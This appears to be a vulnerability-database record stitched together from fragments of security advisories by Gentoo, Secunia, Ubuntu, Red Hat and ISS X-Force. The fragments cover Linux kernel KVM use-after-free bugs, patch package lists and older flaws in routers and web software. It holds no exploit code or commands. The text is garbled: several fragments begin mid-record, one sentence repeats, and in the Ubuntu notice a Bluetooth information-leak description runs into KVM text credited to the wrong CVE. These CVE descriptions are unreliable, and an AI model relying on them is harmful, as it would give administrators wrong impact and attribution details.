[ 3 ] CVE-2008-2364
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2364
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200807-06.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ----------------------------------------------------------------------
Do you have VARM strategy implemented?
(Vulnerability Assessment Remediation Management)
If not, then implement it through the most reliable vulnerability
intelligence source on the market.
Implement it through Secunia.
The vulnerability is caused due to an unspecified error, which can be
exploited to cause a high memory usage when the application is used as
a reverse proxy.
Please see the vendor's advisory for a full list of affected
products.
SOLUTION:
Update to a fixed version. See vendor advisory for details.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS09-009/index.html
OTHER REFERENCES:
http://jvndb.jvn.jp/en/contents/2009/JVNDB-2009-001740.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
References: CVE-2006-3918, CVE-2007-4465, CVE-2007-6203, CVE-2008-0005, CVE-2008-0599, CVE-2008-2168, CVE-2008-2364, CVE-2008-2371, CVE-2008-2665, CVE-2008-2666, CVE-2008-2829, CVE-2008-2939, CVE-2008-3658, CVE-2008-3659, CVE-2008-3660, CVE-2008-5498, CVE-2008-5557, CVE-2008-5624, CVE-2008-5625, CVE-2008-5658 |
|
var-201902-0242
|
In the Linux kernel before 4.20.8, kvm_ioctl_create_device in virt/kvm/kvm_main.c mishandles reference counting because of a race condition, leading to a use-after-free. Linux kernel is prone to a security bypass vulnerability.
Attackers can exploit this issue to bypass security restrictions to perform unauthorized actions; this may aid in launching further attacks.
Versions prior to Linux kernel 4.20.8 are vulnerable. 7.5) - ppc64, ppc64le, x86_64
3.
Bug Fix(es):
* A cluster node has multiple hung "mv" processes that are accessing a gfs2
filesystem. (BZ#1716321)
* Growing unreclaimable slab memory (BZ#1741918)
* [LLNL 7.5 Bug] slab leak causing a crash when using kmem control group
(BZ#1748236)
* kernel build: parallelize redhat/mod-sign.sh (BZ#1755328)
* kernel build: speed up module compression step (BZ#1755337)
4. ==========================================================================
Ubuntu Security Notice USN-3930-2
April 02, 2019
linux-hwe, linux-azure vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in the Linux kernel.
This update provides the corresponding updates for the Linux Hardware
Enablement (HWE) kernel from Ubuntu 18.10 for Ubuntu 18.04 LTS.
Mathias Payer and Hui Peng discovered a use-after-free vulnerability in the
Advanced Linux Sound Architecture (ALSA) subsystem. A physically proximate
attacker could use this to cause a denial of service (system crash).
(CVE-2018-19824)
Shlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an information
leak in the Bluetooth implementation of the Linux kernel. An attacker
within Bluetooth range could use this to expose sensitive information
(kernel memory). An attacker in a guest VM with
access to /dev/kvm could use this to cause a denial of service (guest VM
crash). (CVE-2019-6974)
Jim Mattson and Felix Wilhelm discovered a use-after-free vulnerability in
the KVM subsystem of the Linux kernel, when using nested virtual machines.
A local attacker in a guest VM could use this to cause a denial of service
(system crash) or possibly execute arbitrary code in the host system.
(CVE-2019-7221)
Felix Wilhelm discovered that an information leak vulnerability existed in
the KVM subsystem of the Linux kernel, when nested virtualization is used.
A local attacker could use this to expose sensitive information (host
system memory to a guest VM). (CVE-2019-7222)
Jann Horn discovered that the eBPF implementation in the Linux kernel was
insufficiently hardened against Spectre V1 attacks. A local attacker could
use this to expose sensitive information. (CVE-2019-7308)
It was discovered that a use-after-free vulnerability existed in the user-
space API for crypto (af_alg) implementation in the Linux kernel. A local
attacker could use this to cause a denial of service (system crash) or
possibly execute arbitrary code. A local attacker could use this to
cause a denial of service (system crash) or possibly execute arbitrary
code. (CVE-2019-8956)
It was discovered that the Linux kernel did not properly deallocate memory
when handling certain errors while reading files. A local attacker could
use this to cause a denial of service (excessive memory consumption). A local attacker with access to the
IPMI character device files could use this to cause a denial of service
(system crash). (CVE-2019-9003)
Jann Horn discovered that the SNMP NAT implementation in the Linux kernel
performed insufficient ASN.1 length checks. An attacker could use this to
cause a denial of service (system crash) or possibly execute arbitrary
code. (CVE-2019-9162)
Jann Horn discovered that the mmap implementation in the Linux kernel did
not properly check for the mmap minimum address in some situations. A local
attacker could use this to assist exploiting a kernel NULL pointer
dereference vulnerability. (CVE-2019-9213)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 18.04 LTS:
linux-image-4.18.0-1014-azure 4.18.0-1014.14~18.04.1
linux-image-4.18.0-17-generic 4.18.0-17.18~18.04.1
linux-image-4.18.0-17-generic-lpae 4.18.0-17.18~18.04.1
linux-image-4.18.0-17-lowlatency 4.18.0-17.18~18.04.1
linux-image-4.18.0-17-snapdragon 4.18.0-17.18~18.04.1
linux-image-azure 4.18.0.1014.13
linux-image-generic-hwe-18.04 4.18.0.17.67
linux-image-generic-lpae-hwe-18.04 4.18.0.17.67
linux-image-lowlatency-hwe-18.04 4.18.0.17.67
linux-image-snapdragon-hwe-18.04 4.18.0.17.67
linux-image-virtual-hwe-18.04 4.18.0.17.67
After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed.
Unless you manually uninstalled the standard kernel metapackages
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,
linux-powerpc), a standard system upgrade will automatically perform
this as well. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: kernel security and bug fix update
Advisory ID: RHSA-2019:0818-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2019:0818
Issue date: 2019-04-23
CVE Names: CVE-2019-6974 CVE-2019-7221
====================================================================
1. Summary:
An update for kernel is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3.
Security Fix(es):
* Kernel: KVM: potential use-after-free via kvm_ioctl_create_device()
(CVE-2019-6974)
* Kernel: KVM: nVMX: use-after-free of the hrtimer for emulation of the
preemption timer (CVE-2019-7221)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Bug Fix(es):
* rbd: avoid corruption on partially completed bios [rhel-7.6.z]
(BZ#1672514)
* xfs_vm_writepages deadly embrace between kworker and user task.
[rhel-7.6.z] (BZ#1673281)
* Offload Connections always get vlan priority 0 [rhel-7.6.z] (BZ#1673821)
* [NOKIA] RHEL sends flood of Neighbour Solicitations under specific
conditions [rhel-7.6.z] (BZ#1677179)
* RHEL 7.6 - Host crash occurred on NVMe/IB system while running controller
reset [rhel-7.6.z] (BZ#1678214)
* [rhel7] raid0 md workqueue deadlock with stacked md devices [rhel-7.6.z]
(BZ#1678215)
* [PureStorage7.6]nvme disconnect following an unsuccessful Admin queue
creation causes kernel panic [rhel-7.6.z] (BZ#1678216)
* RFC: Regression with -fstack-check in 'backport upstream large stack
guard patch to RHEL6' patch [rhel-7.6.z] (BZ#1678221)
* [Hyper-V] [RHEL 7.6]hv_netvsc: Fix a network regression after ifdown/ifup
[rhel-7.6.z] (BZ#1679997)
* rtc_cmos: probe of 00:01 failed with error -16 [rhel-7.6.z] (BZ#1683078)
* ACPI WDAT watchdog update [rhel-7.6.z] (BZ#1683079)
* high ovs-vswitchd CPU usage when VRRP over VXLAN tunnel causing qrouter
fail-over [rhel-7.6.z] (BZ#1683093)
* Openshift node drops outgoing POD traffic due to NAT hashtable race in
__ip_conntrack_confirm() [rhel-7.6.z] (BZ#1686766)
* [Backport] [v3,2/2] net: igmp: Allow user-space configuration of igmp
unsolicited report interval [rhel-7.6.z] (BZ#1686771)
* [RHEL7.6]: Intermittently seen FIFO parity error on T6225-SO adapter
[rhel-7.6.z] (BZ#1687487)
* The number of unsolict report about IGMP is incorrect [rhel-7.6.z]
(BZ#1688225)
* RDT driver causing failure to boot on AMD Rome system with more than 255
CPUs [rhel-7.6.z] (BZ#1689120)
* mpt3sas_cm0: fault_state(0x2100)! [rhel-7.6.z] (BZ#1689379)
* rwsem in inconsistent state leading system to hung [rhel-7.6.z]
(BZ#1690323)
Users of kernel are advised to upgrade to these updated packages, which fix
these bugs.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
5. Bugs fixed (https://bugzilla.redhat.com/):
1671904 - CVE-2019-7221 Kernel: KVM: nVMX: use-after-free of the hrtimer for emulation of the preemption timer
1671913 - CVE-2019-6974 Kernel: KVM: potential use-after-free via kvm_ioctl_create_device()
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
kernel-3.10.0-957.12.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-957.12.1.el7.noarch.rpm
kernel-doc-3.10.0-957.12.1.el7.noarch.rpm
x86_64:
bpftool-3.10.0-957.12.1.el7.x86_64.rpm
kernel-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debug-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm
kernel-devel-3.10.0-957.12.1.el7.x86_64.rpm
kernel-headers-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-957.12.1.el7.x86_64.rpm
perf-3.10.0-957.12.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
python-perf-3.10.0-957.12.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-957.12.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
kernel-3.10.0-957.12.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-957.12.1.el7.noarch.rpm
kernel-doc-3.10.0-957.12.1.el7.noarch.rpm
x86_64:
bpftool-3.10.0-957.12.1.el7.x86_64.rpm
kernel-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debug-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm
kernel-devel-3.10.0-957.12.1.el7.x86_64.rpm
kernel-headers-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-957.12.1.el7.x86_64.rpm
perf-3.10.0-957.12.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
python-perf-3.10.0-957.12.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-957.12.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
kernel-3.10.0-957.12.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-957.12.1.el7.noarch.rpm
kernel-doc-3.10.0-957.12.1.el7.noarch.rpm
ppc64:
kernel-3.10.0-957.12.1.el7.ppc64.rpm
kernel-bootwrapper-3.10.0-957.12.1.el7.ppc64.rpm
kernel-debug-3.10.0-957.12.1.el7.ppc64.rpm
kernel-debug-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm
kernel-debug-devel-3.10.0-957.12.1.el7.ppc64.rpm
kernel-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm
kernel-debuginfo-common-ppc64-3.10.0-957.12.1.el7.ppc64.rpm
kernel-devel-3.10.0-957.12.1.el7.ppc64.rpm
kernel-headers-3.10.0-957.12.1.el7.ppc64.rpm
kernel-tools-3.10.0-957.12.1.el7.ppc64.rpm
kernel-tools-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm
kernel-tools-libs-3.10.0-957.12.1.el7.ppc64.rpm
perf-3.10.0-957.12.1.el7.ppc64.rpm
perf-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm
python-perf-3.10.0-957.12.1.el7.ppc64.rpm
python-perf-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm
ppc64le:
kernel-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-bootwrapper-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-debug-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-debug-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-debuginfo-common-ppc64le-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-devel-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-headers-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-tools-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-tools-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-tools-libs-3.10.0-957.12.1.el7.ppc64le.rpm
perf-3.10.0-957.12.1.el7.ppc64le.rpm
perf-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm
python-perf-3.10.0-957.12.1.el7.ppc64le.rpm
python-perf-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm
s390x:
kernel-3.10.0-957.12.1.el7.s390x.rpm
kernel-debug-3.10.0-957.12.1.el7.s390x.rpm
kernel-debug-debuginfo-3.10.0-957.12.1.el7.s390x.rpm
kernel-debug-devel-3.10.0-957.12.1.el7.s390x.rpm
kernel-debuginfo-3.10.0-957.12.1.el7.s390x.rpm
kernel-debuginfo-common-s390x-3.10.0-957.12.1.el7.s390x.rpm
kernel-devel-3.10.0-957.12.1.el7.s390x.rpm
kernel-headers-3.10.0-957.12.1.el7.s390x.rpm
kernel-kdump-3.10.0-957.12.1.el7.s390x.rpm
kernel-kdump-debuginfo-3.10.0-957.12.1.el7.s390x.rpm
kernel-kdump-devel-3.10.0-957.12.1.el7.s390x.rpm
perf-3.10.0-957.12.1.el7.s390x.rpm
perf-debuginfo-3.10.0-957.12.1.el7.s390x.rpm
python-perf-3.10.0-957.12.1.el7.s390x.rpm
python-perf-debuginfo-3.10.0-957.12.1.el7.s390x.rpm
x86_64:
bpftool-3.10.0-957.12.1.el7.x86_64.rpm
kernel-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debug-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm
kernel-devel-3.10.0-957.12.1.el7.x86_64.rpm
kernel-headers-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-957.12.1.el7.x86_64.rpm
perf-3.10.0-957.12.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
python-perf-3.10.0-957.12.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
kernel-debug-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm
kernel-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm
kernel-debuginfo-common-ppc64-3.10.0-957.12.1.el7.ppc64.rpm
kernel-tools-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm
kernel-tools-libs-devel-3.10.0-957.12.1.el7.ppc64.rpm
perf-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm
python-perf-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm
ppc64le:
kernel-debug-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-debug-devel-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-debuginfo-common-ppc64le-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-tools-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm
kernel-tools-libs-devel-3.10.0-957.12.1.el7.ppc64le.rpm
perf-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm
python-perf-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm
x86_64:
kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-957.12.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
kernel-3.10.0-957.12.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-957.12.1.el7.noarch.rpm
kernel-doc-3.10.0-957.12.1.el7.noarch.rpm
x86_64:
bpftool-3.10.0-957.12.1.el7.x86_64.rpm
kernel-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debug-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm
kernel-devel-3.10.0-957.12.1.el7.x86_64.rpm
kernel-headers-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-957.12.1.el7.x86_64.rpm
perf-3.10.0-957.12.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
python-perf-3.10.0-957.12.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-957.12.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2019-6974
https://access.redhat.com/security/cve/CVE-2019-7221
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBXL8hr9zjgjWX9erEAQhpRA//SO28D0BzCiZeNMWg7p//rAc9DGgsNxnq
CMBTE2lJGOOt0DXTAw9Y3h/p46aA1UUbGmjUtL/Vvu0RUpuuPTOa3hzviavXVGBu
PLh+QHRw9E9NBi90T24R2M0CeuUCVDn2UUqIWia7d5bb3VuS6zCjP8cq9bBa7kBN
/bpYXeCv38pLGDU2H8P8N7EY4pFJBXp7CpiuLvsMgxNfUlxEZh913BfStDHWJAg2
yi9NdCNtG+3hFB3LhLEedYTGxfZmuNBp8K9D6en1RryideGeyyjGiKKShRGclD+o
KOnuXrPuHdS5fO1ci8FzymQapQSzUWjuwYXmqFAaPLLOGesGgb1wiCKgqLN3+3Oy
jjlDtD8lkiZDNwDRs27WOkQMzsV/+J0cUAQOoP0KbetSQSJuRLXD0Kkss0c8kpO6
W7YVpwVnMioe0jFtpNu8OtjIgsTRycZ+Z01Mr7U/gH9J7i5Dysvtil+2i2xBPnM5
+vLPIDzreB+pbG5BPrIUgM/CkYh5Yltq4nbiifhWXdSxR/t0a06in60SbDezB6Lt
SnQavsmJSZBQ5iEhQABcMNChZPeZj1N5haC4ZFP8XD9gJLZyrNqL1tBLzVr4xhzx
+4Trsi6td3ZuQe0wdX2rS07oIk6Tjc2yxNaiGMvM4NPYt4ZOswZvyQYk4QPJ2VRN
zd1Qi+4M27U=IoLu
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. 7.4) - noarch, x86_64
3.
Bug Fix(es):
* guest softlockup in mem_cgroup_reparent_charges with 800GB guests
(BZ#1770111)
* [RHEL7.7] Refined TSC clocksource calibration occasionally fails on some
SkyLake-X servers (BZ#1775682)
4.
M. 7) - aarch64, noarch, ppc64le
3.
Bug Fix(es):
* [kernel-alt]: BUG: unable to handle kernel NULL pointer IP:
crypto_remove_spawns+0x118/0x2e0 (BZ#1536967)
* [HPE Apache] update ssif max_xmit_msg_size limit for multi-part messages
(BZ#1610534)
* RHEL-Alt-7.6 - powerpc/pseries: Fix unitialized timer reset on migration
/ powerpc/pseries/mobility: Extend start/stop topology update scope (LPM)
(BZ#1673613)
* RHEL-Alt-7.6 - s390: sha3_generic module fails and triggers panic when in
FIPS mode (BZ#1673979)
* RHEL-Alt-7.6 - System crashed after oom - During ICP deployment
(BZ#1710304)
* kernel-alt: Race condition in hashtables [rhel-alt-7.6.z] (BZ#1712127)
* RHEL-Alt-7.6 - OP930:PM_Test:cpupower -r command set values for first 3
cores in quad and misses last core. (CORAL) (BZ#1717836)
* RHEL-Alt-7.6 - disable runtime NUMA remapping for PRRN/LPM/VPHN
(BZ#1717906)
* fragmented packets timing out (BZ#1729066)
* Backport TCP follow-up for small buffers (BZ#1733617)
Enhancement(s):
* RHEL-Alt-7.6 - perfevent PMDA cannot create file descriptors for reading
nest events using the perf API (pcp/kernel) (CORAL) (BZ#1723036)
4 |
|
var-200102-0030
|
The Web interface to Cisco 600 routers running CBOS 2.4.1 and earlier allow remote attackers to cause a denial of service via a URL that does not end in a space character. The Oracle LDAP Daemon (oidldapd version 2.1.1.1), which ships with Oracle version 8i for Linux version 8.1.7, does not check write permissions properly. This can allow a local user to delete or write to any file on the system. There is a buffer overflow in the IBM AIX setclock command that may allow local attackers to gain root privileges. -----BEGIN PGP SIGNED MESSAGE-----
Internet Security Systems Security Alert Summary
January 1, 2001
Volume 6 Number 2
The following computer security issues have been publicly reported and
documented in the X-Force Vulnerability and Threat Database
(http://xforce.iss.net).
This document is available at
http://xforce.iss.net/alerts/vol-06_num-02.php. To receive these Alert
Summaries:
- - Subscribe to the Alert mailing list from
http://xforce.iss.net/maillists/index.php
- - Or send an email to majordomo@iss.net, and within the body of the
message type:
- - 'subscribe alert' (without the quotes).
_____
Contents
115 Reported Vulnerabilities
Risk Factor Key
_____
Date Reported: 12/31/00
Vulnerability: exmh-error-symlink
Platforms Affected: exmh 2.2 and earlier
Risk Factor: High
Attack Type: Host Based
Brief Description: exmh error message symlink
X-Force URL: http://xforce.iss.net/static/5829.php
_____
Date Reported: 12/30/00
Vulnerability: informix-webdriver-symlink
Platforms Affected: Informix Webdriver
Risk Factor: High
Attack Type: Host Based
Brief Description: Informix Webdriver symbolic link
X-Force URL: http://xforce.iss.net/static/5827.php
_____
Date Reported: 12/30/00
Vulnerability: informix-webdriver-admin-access
Platforms Affected: Informix Webdriver
Risk Factor: High
Attack Type: Network Based
Brief Description: Informix Webdriver remote Admin access
X-Force URL: http://xforce.iss.net/static/5833.php
_____
Date Reported: 12/29/00
Vulnerability: zonealarm-mutex-dos
Platforms Affected: ZoneAlarm Pro
Risk Factor: Medium
Attack Type: Host Based
Brief Description: ZoneAlarm and ZoneAlarm Pro Mutex creation denial
of service
X-Force URL: http://xforce.iss.net/static/5821.php
_____
Date Reported: 12/29/00
Vulnerability: zonealarm-batfile-dos
Platforms Affected: ZoneAlarm Pro
Risk Factor: Medium
Attack Type: Host Based
Brief Description: ZoneAlarm and ZoneAlarm Pro can be taken down with
a batch file
X-Force URL: http://xforce.iss.net/static/5822.php
_____
Date Reported: 12/29/00
Vulnerability: shockwave-flash-swf-bo
Platforms Affected: Shockwave Plugin 8.0 and prior
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: Shockwave Flash SWF file buffer overflow
X-Force URL: http://xforce.iss.net/static/5826.php
_____
Date Reported: 12/29/00
Vulnerability: macos-multiple-users
Platforms Affected: MacOS 9.0
Risk Factor: High
Attack Type: Host Based
Brief Description: Mac OS 'Multiple Users' bypass password
X-Force URL: http://xforce.iss.net/static/5830.php
_____
Date Reported: 12/28/00
Vulnerability: http-cgi-ikonboard
Platforms Affected: Ikonboard 2.1.7b and prior
Risk Factor: High
Attack Type: Host Based
Brief Description: Ikonboard allows remote attacker to execute
commands
X-Force URL: http://xforce.iss.net/static/5819.php
_____
Date Reported: 12/27/00
Vulnerability: http-cgi-technote-main
Platforms Affected: TECH-NOTE (000, 2001, Pro)
Risk Factor: High
Attack Type: Network Based
Brief Description: TECH-NOTE main.cgi reveals files
X-Force URL: http://xforce.iss.net/static/5813.php
_____
Date Reported: 12/26/00
Vulnerability: xwindows-char-dos
Platforms Affected: XFree86
Risk Factor: Low
Attack Type: Network/Host Based
Brief Description: X Windows multiple character denial of service
X-Force URL: http://xforce.iss.net/static/5834.php
_____
Date Reported: 12/25/00
Vulnerability: 1stup-mail-server-bo
Platforms Affected: 1st Up Mail Server 4.1
Risk Factor: Medium
Attack Type: Network Based
Brief Description: 1st Up Mail Server buffer overflow
X-Force URL: http://xforce.iss.net/static/5808.php
_____
Date Reported: 12/25/00
Vulnerability: dialog-symlink
Platforms Affected: Linux Debian 2.2
Risk Factor: High
Attack Type: Host Based
Brief Description: Linux dialog package symlink attack
X-Force URL: http://xforce.iss.net/static/5809.php
_____
Date Reported: 12/25/00
Vulnerability: ibm-wcs-admin
Platforms Affected: IBM Websphere Commerce Suite
Risk Factor: High
Attack Type: Host Based
Brief Description: IBM WCS admin.config allows user to execute
arbitrary commands
X-Force URL: http://xforce.iss.net/static/5831.php
_____
Date Reported: 12/23/00
Vulnerability: http-cgi-technote-print
Platforms Affected: TECH-NOTE (2000, 2001, Pro)
Risk Factor: Medium
Attack Type: Network Based
Brief Description: TECH-NOTE print.cgi reveals files
